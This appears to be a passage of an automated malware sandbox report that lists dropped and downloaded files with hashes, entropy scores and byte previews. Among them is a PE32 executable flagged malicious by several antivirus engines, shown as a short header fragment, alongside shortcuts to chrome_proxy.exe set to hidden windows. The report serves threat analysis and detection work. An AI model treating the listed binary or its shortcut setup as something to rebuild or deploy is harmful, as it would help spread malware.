                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1212711
                                                                                                                                                  Entropy (8bit):7.912999126781567
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:UAl76qnq2ZULeYTnZXHQJZW6xcZLPLaDWmcGiVPxccmvrJ4428ng:N9hx/gZIeZLPMWbGQsvq/H
                                                                                                                                                  MD5:956D074F7C6BD174C43586F07892E820
                                                                                                                                                  SHA1:45A9273A96E66B3B05D2B53540C1B4DC6C5E2A05
                                                                                                                                                  SHA-256:BDF72E1C0964B7A7B96651B278B6F8D4B42849C01FF2AA6C6844B5AC2A893F3B
                                                                                                                                                  SHA-512:ABB7C98BE2A86A543D353D0ED812FD87A0303BCC858F39A19DE7A3F20829C071BCDC3AFA99D9F82C0C8C9B3C8674D4C9CE2B73A43E0A760CA9BA1A659664BFE3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                                                                                  Preview:MZ`.....................@...............................................!..L.!Require Windows..$....[a..[a..[a..R.~.Ya..R.o.\a..R.y.Ma..R.i.Ja..[a..a..4.d.Ya..4.P._a..4.Q.ja..4.`.Za..4.g.Za..Rich[a..................PE..L......`.................z...........{............@..........................p............@.................................T...........Q@..........?Y...'...P..8....................................................................................text....x.......z.................. ..`.rdata..j5.......6...~..............@..@.data....+..........................@....rsrc...Q@.......B..................@..@.reloc..`....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6222
                                                                                                                                                  Entropy (8bit):3.7053960929355827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:JJlV8AeCdbU2K+DMzukvhkvklCywln2eVGCeL7ci7SogZog+VGCeL7ci7SogZoU1:nldeCeofkvhkvCCtf0JLIHc0JLIHr
                                                                                                                                                  MD5:EC0975773A12840F274A07B7A98B509D
                                                                                                                                                  SHA1:5B148AADBD226554E43B9AB7E6906823EDCEC44C
                                                                                                                                                  SHA-256:990FF13AF85568017D48EEC6E874C6F23B5EA2A109B9B05456F262FF05759402
                                                                                                                                                  SHA-512:8350DAF4D59BB220A189C8A37CF6DE845B84986649B29259551F5A524328DB686B4C07DE5A4154D2291B01CE110936CD1B4DEBF43D37F824693B3FF39E4BBBA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......=[..d..!....d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlUX.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....UX.9..Roaming.@......DWSlUX.9....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlUX.9....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlUX.9....E........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlUX.9....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlUX.9....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6222
                                                                                                                                                  Entropy (8bit):3.7053960929355827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:JJlV8AeCdbU2K+DMzukvhkvklCywln2eVGCeL7ci7SogZog+VGCeL7ci7SogZoU1:nldeCeofkvhkvCCtf0JLIHc0JLIHr
                                                                                                                                                  MD5:EC0975773A12840F274A07B7A98B509D
                                                                                                                                                  SHA1:5B148AADBD226554E43B9AB7E6906823EDCEC44C
                                                                                                                                                  SHA-256:990FF13AF85568017D48EEC6E874C6F23B5EA2A109B9B05456F262FF05759402
                                                                                                                                                  SHA-512:8350DAF4D59BB220A189C8A37CF6DE845B84986649B29259551F5A524328DB686B4C07DE5A4154D2291B01CE110936CD1B4DEBF43D37F824693B3FF39E4BBBA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......=[..d..!....d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlUX.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....UX.9..Roaming.@......DWSlUX.9....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlUX.9....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlUX.9....E........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlUX.9....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlUX.9....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2677
                                                                                                                                                  Entropy (8bit):3.979164574485483
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8ndrTz36EHQZidAKZdA19ehwiZUklqehty+3:8J/6jay
                                                                                                                                                  MD5:DEA6799FE712FD5D9A2BAF0FADBF8F82
                                                                                                                                                  SHA1:7914F1342CB43CC5019DF1EC852F942B9E226E9C
                                                                                                                                                  SHA-256:B0A0A876156366C30D6EA21E078B66BF52146E8045094D452D384A0BBBD09974
                                                                                                                                                  SHA-512:323D34C478AC8E91CB32226F00BFCDCC7100AD491F8B58617EAD380C96E9E7622B43395175164A492F9C746392A781FA5F62184CE3F306F7DD2B45826E16B35F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....[...d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2679
                                                                                                                                                  Entropy (8bit):3.9940101891510538
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8+drTz36EHQZidAKZdA1weh/iZUkAQkqehKy+2:82/6R9QLy
                                                                                                                                                  MD5:A3766AFDA1EC0B1F2193B4C8140E9048
                                                                                                                                                  SHA1:BB695C14FE01BFB5923C15E6C2C3D474930E6DBE
                                                                                                                                                  SHA-256:023C07DC3F23029E02D6F0E5853F430EA8EC42697FE90704949E46C6A63BD7F4
                                                                                                                                                  SHA-512:4A4E27D38C3E581A4F307538FB4DFE3F7DAE17C670E9CFDE52F6A388DE30FA215F9465053392EBDD3C8B80C92BED8A3B7FAB62E65C11247DC7FAFF8492AD90E1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,......}..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2693
                                                                                                                                                  Entropy (8bit):4.0020755568155275
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8xQdrTz3sHQZidAKZdA14tseh7sFiZUkmgqeh7sAy+BX:8x0/JnWy
                                                                                                                                                  MD5:BB2D4B8FF8A7D169DE36BA7CF5A6DE9C
                                                                                                                                                  SHA1:BA1E79130FCD8D08DB849907185CCD1B9E4440E3
                                                                                                                                                  SHA-256:DB6EEAFA1FA81F7E66D583472F82A587B8583E81D3F2BB544287EDA73FB8E287
                                                                                                                                                  SHA-512:FE79F8CFF3F3C14ECEF20474BC9A4A8E93523811BA390CB402C1AE48C43843D5D3D12F3B01B4F369183638ECC8D8C82E9112A6D2A152D279AC66446A9796B96E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2681
                                                                                                                                                  Entropy (8bit):3.9897190823500814
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8bvdrTz36EHQZidAKZdA1vehDiZUkwqehOy+R:8bh/6SYy
                                                                                                                                                  MD5:30C6E8E0438BC76C6E85486FCEC90824
                                                                                                                                                  SHA1:090A0B3632D7A91FC6DB8FA71CCD13C26AFFD6BC
                                                                                                                                                  SHA-256:3327B8469284976A3934B66A33AEF5BC2E84109FCAA671CC368CC4AAC9B2CE46
                                                                                                                                                  SHA-512:73A7F96EABC97B588A7103610B6EA268B0AE98834952821CCD59675880E463E291A0C695CC99CAD13273E0C30B11E1E1D81F30E845B7677E77B9C71CAD8A6CFB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....uw..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2681
                                                                                                                                                  Entropy (8bit):3.9776965076959248
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8XdrTz36EHQZidAKZdA1hehBiZUk1W1qeh8y+C:8Z/6i9cy
                                                                                                                                                  MD5:E39D080150C07894C474D636A861C22D
                                                                                                                                                  SHA1:149E1A5CFF67437576BF01554B2885B916DADD3F
                                                                                                                                                  SHA-256:D3565D9F2878EF9827F5A7D96F3F2AA02DDDC166DB13571BFFAF19B7126C5B01
                                                                                                                                                  SHA-512:A4432BD78CA3B3196BF2CE0619FADFBE267089DF8C7C09AF2A10D07DECB17648D85CB12570FE509286493190A18DBD59F963029F3EF12DEFE85C40C2CEA63CC5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,....n....d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2683
                                                                                                                                                  Entropy (8bit):3.988222124042782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8VdrTz36EHQZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbWy+yT+:8j/6cT/TbxWOvTbWy7T
                                                                                                                                                  MD5:BF9668F1E451E380D6A7CC6D06C38298
                                                                                                                                                  SHA1:963F6EB2034441E3130EFE7D03E951A10B588733
                                                                                                                                                  SHA-256:D6E3F61B8877EF91B735B01352C4703471374E936D97CD6344723C4E9367759B
                                                                                                                                                  SHA-512:3C0087769A0A03C9617C027595F21612C7B02586A7322AC019DCC72D4C872CEE0EF4110615836853778A49D028D9A1A32E3CDF3D840C3C0E05E43B4C3EAB6B11
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L..................F.@.. ...$+.,....~.n..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (56398), with no line terminators
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):56398
                                                                                                                                                  Entropy (8bit):5.907604034780877
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:+LUmmAWTe2uXYp8Mi+yKYlebyB5lxRx54PHSGdXXwW7MFWwXVuE2:4UcW6v+0B5chXwW49z2
                                                                                                                                                  MD5:EB4BC511F79F7A1573B45F5775B3A99B
                                                                                                                                                  SHA1:D910FB51AD7316AA54F055079374574698E74B35
                                                                                                                                                  SHA-256:7859A62E04B0ACB06516EB12454DE6673883ECFAEAED6C254659BCA7CD59C050
                                                                                                                                                  SHA-512:EC9BDF1C91B6262B183FD23F640EAC22016D1F42DB631380676ED34B962E01BADDA91F9CBDFA189B42FE3182A992F1B95A7353AF41E41B2D6E1DAB17E87637A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css
                                                                                                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):102
                                                                                                                                                  Entropy (8bit):4.989054234716049
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:JSbMqSL1cdXWKQK43xrcphyAeWaee:PLKdXNQKqAeL
                                                                                                                                                  MD5:1167D6356DB396071EE04367695481DB
                                                                                                                                                  SHA1:BAAC3F93333B125BDAAE6945D12501BD2331699D
                                                                                                                                                  SHA-256:7D4765F9E5EF9C44C30128CF2055EA61529F0C9FDF121B4DDCA394DA954D82DF
                                                                                                                                                  SHA-512:A601002BBFD89C96CDFB1B3D4CDC01586953E19E497BDE8C11B186F92052FD7373CBCA794109F64F944EE079CE99F15DA607BBE5B9A3243C5D14A97D1C1E86CA
                                                                                                                                                  Malicious:false
                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA
                                                                                                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');
                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):15344
                                                                                                                                                  Entropy (8bit):7.984625225844861
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                  Malicious:false
                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
